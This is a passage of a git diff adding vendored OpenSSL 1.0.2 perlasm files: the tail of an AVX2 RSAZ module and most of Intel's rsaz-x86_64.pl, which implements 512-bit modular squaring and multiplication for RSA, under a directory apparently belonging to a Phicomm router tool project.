+	.byte	0x2c,0xd8,0x07,0x00	#vmovaps 0x70(rsp),xmm13
+	.byte	0x27,0xc8,0x06,0x00	#vmovaps 0x60(rsp),xmm12
+	.byte	0x22,0xb8,0x05,0x00	#vmovaps 0x50(rsp),xmm11
+	.byte	0x1d,0xa8,0x04,0x00	#vmovaps 0x40(rsp),xmm10
+	.byte	0x18,0x98,0x03,0x00	#vmovaps 0x30(rsp),xmm9
+	.byte	0x13,0x88,0x02,0x00	#vmovaps 0x20(rsp),xmm8
+	.byte	0x0e,0x78,0x01,0x00	#vmovaps 0x10(rsp),xmm7
+	.byte	0x09,0x68,0x00,0x00	#vmovaps 0x00(rsp),xmm6
+	.byte	0x04,0x01,0x15,0x00	#sub	rsp,0xa8
+___
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval($1)/ge;
+
+	s/\b(sh[rl]d?\s+\$)(-?[0-9]+)/$1.$2%64/ge		or
+
+	s/\b(vmov[dq])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go		or
+	s/\b(vmovdqu)\b(.+)%x%ymm([0-9]+)/$1$2%xmm$3/go		or
+	s/\b(vpinsr[qd])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go	or
+	s/\b(vpextr[qd])\b(.+)%ymm([0-9]+)/$1$2%xmm$3/go	or
+	s/\b(vpbroadcast[qd]\s+)%ymm([0-9]+)/$1%xmm$2/go;
+	print $_,"\n";
+}
+
+}}} else {{{
+print <<___;	# assembler is too old
+.text
+
+.globl	rsaz_avx2_eligible
+.type	rsaz_avx2_eligible,\@abi-omnipotent
+rsaz_avx2_eligible:
+	xor	%eax,%eax
+	ret
+.size	rsaz_avx2_eligible,.-rsaz_avx2_eligible
+
+.globl	rsaz_1024_sqr_avx2
+.globl	rsaz_1024_mul_avx2
+.globl	rsaz_1024_norm2red_avx2
+.globl	rsaz_1024_red2norm_avx2
+.globl	rsaz_1024_scatter5_avx2
+.globl	rsaz_1024_gather5_avx2
+.type	rsaz_1024_sqr_avx2,\@abi-omnipotent
+rsaz_1024_sqr_avx2:
+rsaz_1024_mul_avx2:
+rsaz_1024_norm2red_avx2:
+rsaz_1024_red2norm_avx2:
+rsaz_1024_scatter5_avx2:
+rsaz_1024_gather5_avx2:
+	.byte	0x0f,0x0b	# ud2
+	ret
+.size	rsaz_1024_sqr_avx2,.-rsaz_1024_sqr_avx2
+___
+}}}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/rsaz-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/rsaz-x86_64.pl
new file mode 100755
index 0000000..3bd45db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/rsaz-x86_64.pl
@@ -0,0 +1,2144 @@
+#!/usr/bin/env perl
+
+##############################################################################
+#                                                                            #
+#  Copyright (c) 2012, Intel Corporation                                     #
+#                                                                            #
+#  All rights reserved.                                                      #
+#                                                                            #
+#  Redistribution and use in source and binary forms, with or without        #
+#  modification, are permitted provided that the following conditions are    #
+#  met:                                                                      #
+#                                                                            #
+#  *  Redistributions of source code must retain the above copyright         #
+#     notice, this list of conditions and the following disclaimer.          #
+#                                                                            #
+#  *  Redistributions in binary form must reproduce the above copyright      #
+#     notice, this list of conditions and the following disclaimer in the    #
+#     documentation and/or other materials provided with the                 #
+#     distribution.                                                          #
+#                                                                            #
+#  *  Neither the name of the Intel Corporation nor the names of its         #
+#     contributors may be used to endorse or promote products derived from   #
+#     this software without specific prior written permission.               #
+#                                                                            #
+#                                                                            #
+#  THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION ""AS IS"" AND ANY          #
+#  EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE         #
+#  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR        #
+#  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION OR            #
+#  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,     #
+#  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,       #
+#  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR        #
+#  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF    #
+#  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING      #
+#  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS        #
+#  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.              #
+#                                                                            #
+##############################################################################
+# Developers and authors:                                                    #
+# Shay Gueron (1, 2), and Vlad Krasnov (1)                                   #
+# (1) Intel Architecture Group, Microprocessor and Chipset Development,      #
+#     Israel Development Center, Haifa, Israel                               #
+# (2) University of Haifa                                                    #
+##############################################################################
+# Reference:                                                                 #
+# [1] S. Gueron, "Efficient Software Implementations of Modular              #
+#     Exponentiation", http://eprint.iacr.org/2011/239                       #
+# [2] S. Gueron, V. Krasnov. "Speeding up Big-Numbers Squaring".             #
+#     IEEE Proceedings of 9th International Conference on Information        #
+#     Technology: New Generations (ITNG 2012), 821-823 (2012).               #
+# [3] S. Gueron, Efficient Software Implementations of Modular Exponentiation#
+#     Journal of Cryptographic Engineering 2:31-43 (2012).                   #
+# [4] S. Gueron, V. Krasnov: "[PATCH] Efficient and side channel analysis    #
+#     resistant 512-bit and 1024-bit modular exponentiation for optimizing   #
+#     RSA1024 and RSA2048 on x86_64 platforms",                              #
+#     http://rt.openssl.org/Ticket/Display.html?id=2582&user=guest&pass=guest#
+##############################################################################
+
+# While original submission covers 512- and 1024-bit exponentiation,
+# this module is limited to 512-bit version only (and as such
+# accelerates RSA1024 sign). This is because improvement for longer
+# keys is not high enough to justify the effort, highest measured
+# was ~5% on Westmere. [This is relative to OpenSSL 1.0.2, upcoming
+# for the moment of this writing!] Nor does this module implement
+# "monolithic" complete exponentiation jumbo-subroutine, but adheres
+# to more modular mixture of C and assembly. And it's optimized even
+# for processors other than Intel Core family (see table below for
+# improvement coefficients).
+# 						<appro@openssl.org>
+#
+# RSA1024 sign/sec	this/original	|this/rsax(*)	this/fips(*)
+#			----------------+---------------------------
+# Opteron		+13%		|+5%		+20%
+# Bulldozer		-0%		|-1%		+10%
+# P4			+11%		|+7%		+8%
+# Westmere		+5%		|+14%		+17%
+# Sandy Bridge		+2%		|+12%		+29%
+# Ivy Bridge		+1%		|+11%		+35%
+# Haswell(**)		-0%		|+12%		+39%
+# Atom			+13%		|+11%		+4%
+# VIA Nano		+70%		|+9%		+25%
+#
+# (*)	rsax engine and fips numbers are presented for reference
+#	purposes;
+# (**)	MULX was attempted, but found to give only marginal improvement;
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$addx = ($1>=2.23);
+}
+
+if (!$addx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$addx = ($1>=2.10);
+}
+
+if (!$addx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$addx = ($1>=12);
+}
+
+if (!$addx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9])\.([0-9]+)/) {
+	my $ver = $2 + $3/100.0;	# 3.1->3.01, 3.10->3.10
+	$addx = ($ver>=3.03);
+}
+
+($out, $inp, $mod) = ("%rdi", "%rsi", "%rbp");	# common internal API
+{
+my ($out,$inp,$mod,$n0,$times) = ("%rdi","%rsi","%rdx","%rcx","%r8d");
+
+$code.=<<___;
+.text
+
+.extern	OPENSSL_ia32cap_P
+
+.globl	rsaz_512_sqr
+.type	rsaz_512_sqr,\@function,5
+.align	32
+rsaz_512_sqr:				# 25-29% faster than rsaz_512_mul
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	subq	\$128+24, %rsp
+.Lsqr_body:
+	movq	$mod, %rbp		# common argument
+	movq	($inp), %rdx
+	movq	8($inp), %rax
+	movq	$n0, 128(%rsp)
+___
+$code.=<<___ if ($addx);
+	movl	\$0x80100,%r11d
+	andl	OPENSSL_ia32cap_P+8(%rip),%r11d
+	cmpl	\$0x80100,%r11d		# check for MULX and ADO/CX
+	je	.Loop_sqrx
+___
+$code.=<<___;
+	jmp	.Loop_sqr
+
+.align	32
+.Loop_sqr:
+	movl	$times,128+8(%rsp)
+#first iteration
+	movq	%rdx, %rbx
+	mulq	%rdx
+	movq	%rax, %r8
+	movq	16($inp), %rax
+	movq	%rdx, %r9
+
+	mulq	%rbx
+	addq	%rax, %r9
+	movq	24($inp), %rax
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	mulq	%rbx
+	addq	%rax, %r10
+	movq	32($inp), %rax
+	movq	%rdx, %r11
+	adcq	\$0, %r11
+
+	mulq	%rbx
+	addq	%rax, %r11
+	movq	40($inp), %rax
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	mulq	%rbx
+	addq	%rax, %r12
+	movq	48($inp), %rax
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	mulq	%rbx
+	addq	%rax, %r13
+	movq	56($inp), %rax
+	movq	%rdx, %r14
+	adcq	\$0, %r14
+
+	mulq	%rbx
+	addq	%rax, %r14
+	movq	%rbx, %rax
+	movq	%rdx, %r15
+	adcq	\$0, %r15
+
+	addq	%r8, %r8		#shlq	\$1, %r8
+	movq	%r9, %rcx
+	adcq	%r9, %r9		#shld	\$1, %r8, %r9
+
+	mulq	%rax
+	movq	%rax, (%rsp)
+	addq	%rdx, %r8
+	adcq	\$0, %r9
+
+	movq	%r8, 8(%rsp)
+	shrq	\$63, %rcx
+
+#second iteration
+	movq	8($inp), %r8
+	movq	16($inp), %rax
+	mulq	%r8
+	addq	%rax, %r10
+	movq	24($inp), %rax
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r8
+	addq	%rax, %r11
+	movq	32($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r11
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r8
+	addq	%rax, %r12
+	movq	40($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r12
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r8
+	addq	%rax, %r13
+	movq	48($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r13
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r8
+	addq	%rax, %r14
+	movq	56($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r14
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r8
+	addq	%rax, %r15
+	movq	%r8, %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r15
+	movq	%rdx, %r8
+	movq	%r10, %rdx
+	adcq	\$0, %r8
+
+	add	%rdx, %rdx
+	lea	(%rcx,%r10,2), %r10	#shld	\$1, %rcx, %r10
+	movq	%r11, %rbx
+	adcq	%r11, %r11		#shld	\$1, %r10, %r11
+
+	mulq	%rax
+	addq	%rax, %r9
+	adcq	%rdx, %r10
+	adcq	\$0, %r11
+
+	movq	%r9, 16(%rsp)
+	movq	%r10, 24(%rsp)
+	shrq	\$63, %rbx
+	
+#third iteration
+	movq	16($inp), %r9	
+	movq	24($inp), %rax
+	mulq	%r9
+	addq	%rax, %r12
+	movq	32($inp), %rax
+	movq	%rdx, %rcx
+	adcq	\$0, %rcx
+
+	mulq	%r9
+	addq	%rax, %r13
+	movq	40($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rcx, %r13
+	movq	%rdx, %rcx
+	adcq	\$0, %rcx
+
+	mulq	%r9
+	addq	%rax, %r14
+	movq	48($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rcx, %r14
+	movq	%rdx, %rcx
+	adcq	\$0, %rcx
+
+	mulq	%r9
+	 movq	%r12, %r10
+	 lea	(%rbx,%r12,2), %r12	#shld	\$1, %rbx, %r12
+	addq	%rax, %r15
+	movq	56($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rcx, %r15
+	movq	%rdx, %rcx
+	adcq	\$0, %rcx
+
+	mulq	%r9
+	 shrq	\$63, %r10
+	addq	%rax, %r8
+	movq	%r9, %rax
+	adcq	\$0, %rdx
+	addq	%rcx, %r8
+	movq	%rdx, %r9
+	adcq	\$0, %r9
+
+	movq	%r13, %rcx
+	leaq	(%r10,%r13,2), %r13	#shld	\$1, %r12, %r13
+
+	mulq	%rax
+	addq	%rax, %r11
+	adcq	%rdx, %r12
+	adcq	\$0, %r13
+
+	movq	%r11, 32(%rsp)
+	movq	%r12, 40(%rsp)
+	shrq	\$63, %rcx
+
+#fourth iteration
+	movq	24($inp), %r10
+	movq	32($inp), %rax
+	mulq	%r10
+	addq	%rax, %r14
+	movq	40($inp), %rax
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r10
+	addq	%rax, %r15
+	movq	48($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r15
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r10
+	 movq	%r14, %r12
+	 leaq	(%rcx,%r14,2), %r14	#shld	\$1, %rcx, %r14
+	addq	%rax, %r8
+	movq	56($inp), %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r8
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r10
+	 shrq	\$63, %r12
+	addq	%rax, %r9
+	movq	%r10, %rax
+	adcq	\$0, %rdx
+	addq	%rbx, %r9
+	movq	%rdx, %r10
+	adcq	\$0, %r10
+
+	movq	%r15, %rbx
+	leaq	(%r12,%r15,2),%r15	#shld	\$1, %r14, %r15
+
+	mulq	%rax
+	addq	%rax, %r13
+	adcq	%rdx, %r14
+	adcq	\$0, %r15
+
+	movq	%r13, 48(%rsp)
+	movq	%r14, 56(%rsp)
+	shrq	\$63, %rbx
+
+#fifth iteration
+	movq	32($inp), %r11
+	movq	40($inp), %rax
+	mulq	%r11
+	addq	%rax, %r8
+	movq	48($inp), %rax
+	movq	%rdx, %rcx
+	adcq	\$0, %rcx
+
+	mulq	%r11
+	addq	%rax, %r9
+	movq	56($inp), %rax
+	adcq	\$0, %rdx
+	 movq	%r8, %r12
+	 leaq	(%rbx,%r8,2), %r8	#shld	\$1, %rbx, %r8
+	addq	%rcx, %r9
+	movq	%rdx, %rcx
+	adcq	\$0, %rcx
+
+	mulq	%r11
+	 shrq	\$63, %r12
+	addq	%rax, %r10
+	movq	%r11, %rax
+	adcq	\$0, %rdx
+	addq	%rcx, %r10
+	movq	%rdx, %r11
+	adcq	\$0, %r11
+
+	movq	%r9, %rcx
+	leaq	(%r12,%r9,2), %r9	#shld	\$1, %r8, %r9
+
+	mulq	%rax
+	addq	%rax, %r15
+	adcq	%rdx, %r8
+	adcq	\$0, %r9
+
+	movq	%r15, 64(%rsp)
+	movq	%r8, 72(%rsp)
+	shrq	\$63, %rcx
+
+#sixth iteration
+	movq	40($inp), %r12
+	movq	48($inp), %rax
+	mulq	%r12
+	addq	%rax, %r10
+	movq	56($inp), %rax
+	movq	%rdx, %rbx
+	adcq	\$0, %rbx
+
+	mulq	%r12
+	addq	%rax, %r11
+	movq	%r12, %rax
+	 movq	%r10, %r15
+	 leaq	(%rcx,%r10,2), %r10	#shld	\$1, %rcx, %r10
+	adcq	\$0, %rdx
+	 shrq	\$63, %r15
+	addq	%rbx, %r11
+	movq	%rdx, %r12
+	adcq	\$0, %r12
+
+	movq	%r11, %rbx
+	leaq	(%r15,%r11,2), %r11	#shld	\$1, %r10, %r11
+
+	mulq	%rax
+	addq	%rax, %r9
+	adcq	%rdx, %r10
+	adcq	\$0, %r11
+
+	movq	%r9, 80(%rsp)
+	movq	%r10, 88(%rsp)
+
+#seventh iteration
+	movq	48($inp), %r13
+	movq	56($inp), %rax
+	mulq	%r13
+	addq	%rax, %r12
+	movq	%r13, %rax
+	movq	%rdx, %r13
+	adcq	\$0, %r13
+
+	xorq	%r14, %r14
+	shlq	\$1, %rbx
+	adcq	%r12, %r12		#shld	\$1, %rbx, %r12
+	adcq	%r13, %r13		#shld	\$1, %r12, %r13
+	adcq	%r14, %r14		#shld	\$1, %r13, %r14
+
+	mulq	%rax
+	addq	%rax, %r11
+	adcq	%rdx, %r12
+	adcq	\$0, %r13
+
+	movq	%r11, 96(%rsp)
+	movq	%r12, 104(%rsp)
+
+#eighth iteration
+	movq	56($inp), %rax
+	mulq	%rax
+	addq	%rax, %r13
+	adcq	\$0, %rdx
+
+	addq	%rdx, %r14
+
+	movq	%r13, 112(%rsp)
+	movq	%r14, 120(%rsp)
+
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reduce
+
+	addq	64(%rsp), %r8
+	adcq	72(%rsp), %r9
+	adcq	80(%rsp), %r10
+	adcq	88(%rsp), %r11
+	adcq	96(%rsp), %r12
+	adcq	104(%rsp), %r13
+	adcq	112(%rsp), %r14
+	adcq	120(%rsp), %r15
+	sbbq	%rcx, %rcx
+
+	call	__rsaz_512_subtract
+
+	movq	%r8, %rdx
+	movq	%r9, %rax
+	movl	128+8(%rsp), $times
+	movq	$out, $inp
+
+	decl	$times
+	jnz	.Loop_sqr
+___
+if ($addx) {
+$code.=<<___;
+	jmp	.Lsqr_tail
+
+.align	32
+.Loop_sqrx:
+	movl	$times,128+8(%rsp)
+	movq	$out, %xmm0		# off-load
+	movq	%rbp, %xmm1		# off-load
+#first iteration	
+	mulx	%rax, %r8, %r9
+
+	mulx	16($inp), %rcx, %r10
+	xor	%rbp, %rbp		# cf=0, of=0
+
+	mulx	24($inp), %rax, %r11
+	adcx	%rcx, %r9
+
+	mulx	32($inp), %rcx, %r12
+	adcx	%rax, %r10
+
+	mulx	40($inp), %rax, %r13
+	adcx	%rcx, %r11
+
+	.byte	0xc4,0x62,0xf3,0xf6,0xb6,0x30,0x00,0x00,0x00	# mulx	48($inp), %rcx, %r14
+	adcx	%rax, %r12
+	adcx	%rcx, %r13
+
+	.byte	0xc4,0x62,0xfb,0xf6,0xbe,0x38,0x00,0x00,0x00	# mulx	56($inp), %rax, %r15
+	adcx	%rax, %r14
+	adcx	%rbp, %r15		# %rbp is 0
+
+	mov	%r9, %rcx
+	shld	\$1, %r8, %r9
+	shl	\$1, %r8
+
+	xor	%ebp, %ebp
+	mulx	%rdx, %rax, %rdx
+	adcx	%rdx, %r8
+	 mov	8($inp), %rdx
+	adcx	%rbp, %r9
+
+	mov	%rax, (%rsp)
+	mov	%r8, 8(%rsp)
+
+#second iteration	
+	mulx	16($inp), %rax, %rbx
+	adox	%rax, %r10
+	adcx	%rbx, %r11
+
+	.byte	0xc4,0x62,0xc3,0xf6,0x86,0x18,0x00,0x00,0x00	# mulx	24($inp), $out, %r8
+	adox	$out, %r11
+	adcx	%r8, %r12
+
+	mulx	32($inp), %rax, %rbx
+	adox	%rax, %r12
+	adcx	%rbx, %r13
+
+	mulx	40($inp), $out, %r8
+	adox	$out, %r13
+	adcx	%r8, %r14
+
+	.byte	0xc4,0xe2,0xfb,0xf6,0x9e,0x30,0x00,0x00,0x00	# mulx	48($inp), %rax, %rbx
+	adox	%rax, %r14
+	adcx	%rbx, %r15
+
+	.byte	0xc4,0x62,0xc3,0xf6,0x86,0x38,0x00,0x00,0x00	# mulx	56($inp), $out, %r8
+	adox	$out, %r15
+	adcx	%rbp, %r8
+	adox	%rbp, %r8
+
+	mov	%r11, %rbx
+	shld	\$1, %r10, %r11
+	shld	\$1, %rcx, %r10
+
+	xor	%ebp,%ebp
+	mulx	%rdx, %rax, %rcx
+	 mov	16($inp), %rdx
+	adcx	%rax, %r9
+	adcx	%rcx, %r10
+	adcx	%rbp, %r11
+
+	mov	%r9, 16(%rsp)
+	.byte	0x4c,0x89,0x94,0x24,0x18,0x00,0x00,0x00		# mov	%r10, 24(%rsp)
+	
+#third iteration	
+	.byte	0xc4,0x62,0xc3,0xf6,0x8e,0x18,0x00,0x00,0x00	# mulx	24($inp), $out, %r9
+	adox	$out, %r12
+	adcx	%r9, %r13
+
+	mulx	32($inp), %rax, %rcx
+	adox	%rax, %r13
+	adcx	%rcx, %r14
+
+	mulx	40($inp), $out, %r9
+	adox	$out, %r14
+	adcx	%r9, %r15
+
+	.byte	0xc4,0xe2,0xfb,0xf6,0x8e,0x30,0x00,0x00,0x00	# mulx	48($inp), %rax, %rcx
+	adox	%rax, %r15
+	adcx	%rcx, %r8
+
+	.byte	0xc4,0x62,0xc3,0xf6,0x8e,0x38,0x00,0x00,0x00	# mulx	56($inp), $out, %r9
+	adox	$out, %r8
+	adcx	%rbp, %r9
+	adox	%rbp, %r9
+
+	mov	%r13, %rcx
+	shld	\$1, %r12, %r13
+	shld	\$1, %rbx, %r12
+
+	xor	%ebp, %ebp
+	mulx	%rdx, %rax, %rdx
+	adcx	%rax, %r11
+	adcx	%rdx, %r12
+	 mov	24($inp), %rdx
+	adcx	%rbp, %r13
+
+	mov	%r11, 32(%rsp)
+	.byte	0x4c,0x89,0xa4,0x24,0x28,0x00,0x00,0x00		# mov	%r12, 40(%rsp)
+	
+#fourth iteration	
+	.byte	0xc4,0xe2,0xfb,0xf6,0x9e,0x20,0x00,0x00,0x00	# mulx	32($inp), %rax, %rbx
+	adox	%rax, %r14
+	adcx	%rbx, %r15
+
+	mulx	40($inp), $out, %r10
+	adox	$out, %r15
+	adcx	%r10, %r8
+
+	mulx	48($inp), %rax, %rbx
+	adox	%rax, %r8
+	adcx	%rbx, %r9
+
+	mulx	56($inp), $out, %r10
+	adox	$out, %r9
+	adcx	%rbp, %r10
+	adox	%rbp, %r10
+
+	.byte	0x66
+	mov	%r15, %rbx
+	shld	\$1, %r14, %r15
+	shld	\$1, %rcx, %r14
+
+	xor	%ebp, %ebp
+	mulx	%rdx, %rax, %rdx
+	adcx	%rax, %r13
+	adcx	%rdx, %r14
+	 mov	32($inp), %rdx
+	adcx	%rbp, %r15
+
+	mov	%r13, 48(%rsp)
+	mov	%r14, 56(%rsp)
+	
+#fifth iteration	
+	.byte	0xc4,0x62,0xc3,0xf6,0x9e,0x28,0x00,0x00,0x00	# mulx	40($inp), $out, %r11
+	adox	$out, %r8
+	adcx	%r11, %r9
+
+	mulx	48($inp), %rax, %rcx
+	adox	%rax, %r9
+	adcx	%rcx, %r10
+
+	mulx	56($inp), $out, %r11
+	adox	$out, %r10
+	adcx	%rbp, %r11
+	adox	%rbp, %r11
+
+	mov	%r9, %rcx
+	shld	\$1, %r8, %r9
+	shld	\$1, %rbx, %r8
+
+	xor	%ebp, %ebp
+	mulx	%rdx, %rax, %rdx
+	adcx	%rax, %r15
+	adcx	%rdx, %r8
+	 mov	40($inp), %rdx
+	adcx	%rbp, %r9
+
+	mov	%r15, 64(%rsp)
+	mov	%r8, 72(%rsp)
+	
+#sixth iteration	
+	.byte	0xc4,0xe2,0xfb,0xf6,0x9e,0x30,0x00,0x00,0x00	# mulx	48($inp), %rax, %rbx
+	adox	%rax, %r10
+	adcx	%rbx, %r11
+
+	.byte	0xc4,0x62,0xc3,0xf6,0xa6,0x38,0x00,0x00,0x00	# mulx	56($inp), $out, %r12
+	adox	$out, %r11
+	adcx	%rbp, %r12
+	adox	%rbp, %r12
+
+	mov	%r11, %rbx
+	shld	\$1, %r10, %r11
+	shld	\$1, %rcx, %r10
+
+	xor	%ebp, %ebp
+	mulx	%rdx, %rax, %rdx
+	adcx	%rax, %r9
+	adcx	%rdx, %r10
+	 mov	48($inp), %rdx
+	adcx	%rbp, %r11
+
+	mov	%r9, 80(%rsp)
+	mov	%r10, 88(%rsp)
+
+#seventh iteration
+	.byte	0xc4,0x62,0xfb,0xf6,0xae,0x38,0x00,0x00,0x00	# mulx	56($inp), %rax, %r13
+	adox	%rax, %r12
+	adox	%rbp, %r13
+
+	xor	%r14, %r14
+	shld	\$1, %r13, %r14
+	shld	\$1, %r12, %r13
+	shld	\$1, %rbx, %r12
+
+	xor	%ebp, %ebp
+	mulx	%rdx, %rax, %rdx
+	adcx	%rax, %r11
+	adcx	%rdx, %r12
+	 mov	56($inp), %rdx
+	adcx	%rbp, %r13
+
+	.byte	0x4c,0x89,0x9c,0x24,0x60,0x00,0x00,0x00		# mov	%r11, 96(%rsp)
+	.byte	0x4c,0x89,0xa4,0x24,0x68,0x00,0x00,0x00		# mov	%r12, 104(%rsp)
+
+#eighth iteration
+	mulx	%rdx, %rax, %rdx
+	adox	%rax, %r13
+	adox	%rbp, %rdx
+
+	.byte	0x66
+	add	%rdx, %r14
+
+	movq	%r13, 112(%rsp)
+	movq	%r14, 120(%rsp)
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	movq	128(%rsp), %rdx		# pull $n0
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reducex
+
+	addq	64(%rsp), %r8
+	adcq	72(%rsp), %r9
+	adcq	80(%rsp), %r10
+	adcq	88(%rsp), %r11
+	adcq	96(%rsp), %r12
+	adcq	104(%rsp), %r13
+	adcq	112(%rsp), %r14
+	adcq	120(%rsp), %r15
+	sbbq	%rcx, %rcx
+
+	call	__rsaz_512_subtract
+
+	movq	%r8, %rdx
+	movq	%r9, %rax
+	movl	128+8(%rsp), $times
+	movq	$out, $inp
+
+	decl	$times
+	jnz	.Loop_sqrx
+
+.Lsqr_tail:
+___
+}
+$code.=<<___;
+
+	leaq	128+24+48(%rsp), %rax
+	movq	-48(%rax), %r15
+	movq	-40(%rax), %r14
+	movq	-32(%rax), %r13
+	movq	-24(%rax), %r12
+	movq	-16(%rax), %rbp
+	movq	-8(%rax), %rbx
+	leaq	(%rax), %rsp
+.Lsqr_epilogue:
+	ret
+.size	rsaz_512_sqr,.-rsaz_512_sqr
+___
+}
+{
+my ($out,$ap,$bp,$mod,$n0) = ("%rdi","%rsi","%rdx","%rcx","%r8");
+$code.=<<___;
+.globl	rsaz_512_mul
+.type	rsaz_512_mul,\@function,5
+.align	32
+rsaz_512_mul:
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+
+	subq	\$128+24, %rsp
+.Lmul_body:
+	movq	$out, %xmm0		# off-load arguments
+	movq	$mod, %xmm1
+	movq	$n0, 128(%rsp)
+___
+$code.=<<___ if ($addx);
+	movl	\$0x80100,%r11d
+	andl	OPENSSL_ia32cap_P+8(%rip),%r11d
+	cmpl	\$0x80100,%r11d		# check for MULX and ADO/CX
+	je	.Lmulx
+___
+$code.=<<___;
+	movq	($bp), %rbx		# pass b[0]
+	movq	$bp, %rbp		# pass argument
+	call	__rsaz_512_mul
+
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reduce
+___
+$code.=<<___ if ($addx);
+	jmp	.Lmul_tail
+
+.align	32
+.Lmulx:
+	movq	$bp, %rbp		# pass argument
+	movq	($bp), %rdx		# pass b[0]
+	call	__rsaz_512_mulx
+
+	movq	%xmm0, $out
+	movq	%xmm1, %rbp
+
+	movq	128(%rsp), %rdx		# pull $n0
+	movq	(%rsp), %r8
+	movq	8(%rsp), %r9
+	movq	16(%rsp), %r10
+	movq	24(%rsp), %r11
+	movq	32(%rsp), %r12
+	movq	40(%rsp), %r13
+	movq	48(%rsp), %r14
+	movq	56(%rsp), %r15
+
+	call	__rsaz_512_reducex
+.Lmul_tail:
+___
+$code.=<<___;
+	addq	64(%rsp), %r8
+	adcq	72(%rsp), %r9
+	adcq	80(%rsp), %r10
+	adcq	88(%rsp), %r11
+	adcq	96(%rsp), %r12
+	adcq	104(%rsp), %r13
+	adcq	112(%rsp), %r14
+	adcq	120(%rsp), %r15
+	sbbq	%rcx, %rcx
+
+	call	__rsaz_512_subtract
+
+	leaq	128+24+48(%rsp), %rax
+	movq	-48(%rax), %r15
+	movq	-40(%rax), %r14
+	movq	-32(%rax), %r13
+	movq	-24(%rax), %r12
+	movq	-16(%rax), %rbp
+	movq	-8(%rax), %rbx
+	leaq	(%rax), %rsp
+.Lmul_epilogue:
+	ret
